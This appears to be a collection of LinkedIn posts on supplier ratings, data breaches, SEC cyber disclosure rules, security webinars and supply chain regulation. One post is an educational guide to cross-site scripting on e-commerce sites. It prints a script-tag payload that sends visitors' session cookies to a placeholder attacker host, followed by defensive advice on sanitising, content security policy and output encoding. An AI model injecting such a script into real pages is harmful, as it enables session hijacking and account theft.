Wired Relations’ Post

SUPPLIERS! Don't forget to rate your brand and retailers' purchasing practices before May 31st! Go to our website and look for the orange SUBMIT A RATING button at the top right hand side of the home page. You don't need to be invited to participate - you can rate any brand or retailer customer with whom you have had a direct business relationship over the past 12 months. It's 100% anonymous, so your business relationships are always protected. Why should you rate? Because improved buyer purchasing practices can benefit you by: ▪           Helping you to meet your social and environment goals while still earning reasonable profits ▪           Improving your workforce and facility utilization (via mutually beneficial costing) ▪           Improving your workforce stability (via more predictable and consistent workflow) ▪           Reducing unexpected finance charges in the procurement and settlement process ▪           Improving product quality products (as buyers better understand the supply-demand cycle) And if you're a first time rater, or looking for a quick refresher, there's plenty of information on our SUPPLIERS page, including video testimonials from suppliers who are already participating, and a step-by-step guide to how to submit a rating. HAPPY RATING ! https://lnkd.in/dAVXXxDP

Another Monday, another 2 major cyber breaches over the weekend. 🟥With over 49 million records leaked out in just one. The other with more sensitive information including: 🟥addresses 🟥phone numbers 🟥bank account information 🟥passport numbers, medicare numbers and driver license details. Serves as a harsh reminder of the vulnerabilities in traditional data storage and that cyber threats are more prevalent than ever. With BlueKee, there's no centralised database to hack. Instead, you securely hold your own verified credentials, sharing them only when necessary. Here's how BlueKee could have helped: ✔️Reduced Risk: By eliminating data storage, BlueKee removes the bullseye for hackers. ✔️Faster & Safer Transactions: Verify your identity seamlessly and securely with businesses without them needing your personal details. ✔️Empowering Control: You hold the keys to your digital identity with BlueKee. Join the Future of Identity: BlueKee puts YOU in control. We're building a future where identity theft is a relic of the past. Learn more about BlueKee and how we can protect your identity in the digital age. https://bluekee.tech/ #BlueKee #DataSecurity #SelfSovereignIdentity #IdentityTheftPrevention #Cybersecurity #digitalid #protection

Did you know that Retail Active is ISO 27001 certified? This accreditation reflects our commitment to maintaining the highest standards of information security and data management, ensuring your business is always in safe hands. #ISO27001 #DataSecurity #RetailActive

SEC publishes finalized Cyber Taxonomy and Guidance The US Securities and Exchange Commission has published the finalized version of its Cybersecurity Disclosure taxonomy, which can be found in its list of standard taxonomies (1). The 13-page "Cybersecurity Disclosure Taxonomy Guide (2) describes the taxonomy and provides guidance in instance creation. The Rules call for Inline XBRL to come online in just a few months; this is a great time to come up to speed on the Rule and its related guidance. The latest update to the EDGAR Filer Manual (3) prepares the way for the new taxonomy. (1) https://lnkd.in/e72qnegT (2) https://lnkd.in/e9SE4W37 (3) https://lnkd.in/eEFDyfRN Note: Cohen Computer Consulting provides training, strategic planning, and other services related to XBRL to enterprises, software developers, and service providers. Contact us for more information.

In this week’s #TradeUpdate, read about globalisation in this digital era and the importance of having a robust business continuity plan. Plus, explore the growth of global e-commerce sales over the past few years, and discover how you can prepare your customer service to ensure a smooth peak season. https://lnkd.in/e9kP8Kf4

XSS: the invisible security threat many e-com sites miss. Here I explore an XSS attack & how to protect your site. (Use it ethically: it's for educational purposes only.) XSS is known as a Cross-Site Scripting attack, and it's a common threat to online businesses. It happens when a hacker injects malicious scripts into webpages viewed by other users. These scripts can do all sorts of things, like: - hijack user sessions - deface websites - steal data No bueno. Below is an example of what an attacker can do and the damage it can cause. Imagine this scenario: Your e-commerce site has a review section where users can leave reviews. Face value, it's nothing out of the ordinary, but here's the catch: The site doesn't properly validate or sanitize the input. So, a bad guy takes advantage of this by injecting a malicious script into the comment box. Something like: <script>document.location='http:// evilsite.com /cookie_snatcher.php?cookie='+document.cookie;</script> So what did they accomplish with this? Well, when an unsuspecting user loads the review, this fun script runs in their browser, capturing their session cookie and sending it to the attacker’s server. And then the fun begins... the attacker can use that cookie to: - impersonate them - steal the user's identity - access the user's account - make unauthorized purchases which, for your brand, can lead to: - loss of customer trust - reputation damage - financial loss - misery Now you can see the kind of impact XSS attacks can have, here's 5 ways to protect against them: 1. Validate and Sanitize Input: Always check and clean user inputs before processing. For example, using a library like DOMPurify in JavaScript can help sanitize HTML input: var cleanHTML = DOMPurify.sanitize(dirtyHTML); 2. Use Content Security Policy (CSP): Implement CSP headers to control what resources can be loaded and executed on your site. Here’s an example of a CSP header: Content-Security-Policy: default-src 'self'; script-src 'self' https:// trustedscripts.example.com; 3. Encode Data: Encode data that is sent to the browser, ensuring that it is treated as data and not as executable code. For example, using PHP’s htmlspecialchars function: echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8'); 4. Keep Software Updated: Regularly update your software and plugins to patch known vulnerabilities. 5. Educate and Train Site security is only as strong as your weakest link. Educate your developers on secure coding practices. By following these best practices, you can significantly reduce the risk of XSS attacks and keep your e-commerce site secure. P.S. This is only one type of XSS attack (Stored), there are others: Reflected and DOM-based. Comment if I should post about the others. P.P.S. Repost ♻️ and help others protect their sites. --- Liked this? Join my newsletter. I cover a new e-com topic each week: lots of value, no fluff, in under 5 minutes. ↳ https://vist.ly/3bv4p

🔒 Unlock the Secrets to Building Trust through Data Security! Join Our Exclusive Webinar! 🔒 In the ever-evolving digital world, data protection is more than a requirement—it's a cornerstone of trust. We invite you to a transformative online event designed to elevate your understanding of data security as a crucial strategy for fostering customer loyalty. 🗓️ Mark Your Calendar: October 24th, 2024 | 2 PM CT 🎤 Featuring insights from the esteemed expert, Saaim Khan, who brings over two decades of experience to the table! Here's what you'll gain: 🌟 Strategies to use security protocols as trust-building tools 🌟 How transparency in data protection can significantly enhance customer loyalty 🌟 Ways to leverage compliance with industry standards to boost your brand's credibility If you're committed to strengthening your brand and enhancing customer loyalty through cutting-edge data security, this webinar is a must-attend! 🌐 👉 Secure Your Spot Now: - https://lnkd.in/gC8wSiVq - Transform your brand's security into its strongest asset! 🚀🔐✨

Federal agencies are leveraging more tools and regulatory authorities than ever to compel companies to monitor their supply chains for national security concerns and other forms of risk. Affected parties should monitor these developments and ensure that their supply chain security programs are properly tailored to each of the government's recent supply chain initiatives. Read more: https://lnkd.in/eUpx7htR This article was authored by #nationalsecurity lawyers Catherine Amirfar, Luke Dembosky, Satish Kini, Erez Liebermann, Richard Sofield, Erez Liebermann, Robert Dura, Gabriel Kohan and Stephanie Thomas

A quick read that discusses how supply chain companies are creating win-win scenarios with their suppliers by way of enhanced rebate programs.

When it comes to your business, is security top of mind? Same with 200+ enterprise hospitality leaders. New research from FreedomPay and Toast found that 99% of leaders surveyed believe a secure payment gateway is an essential feature to ensure security. Download the report to uncover more insights: https://bit.ly/4ciQNvQ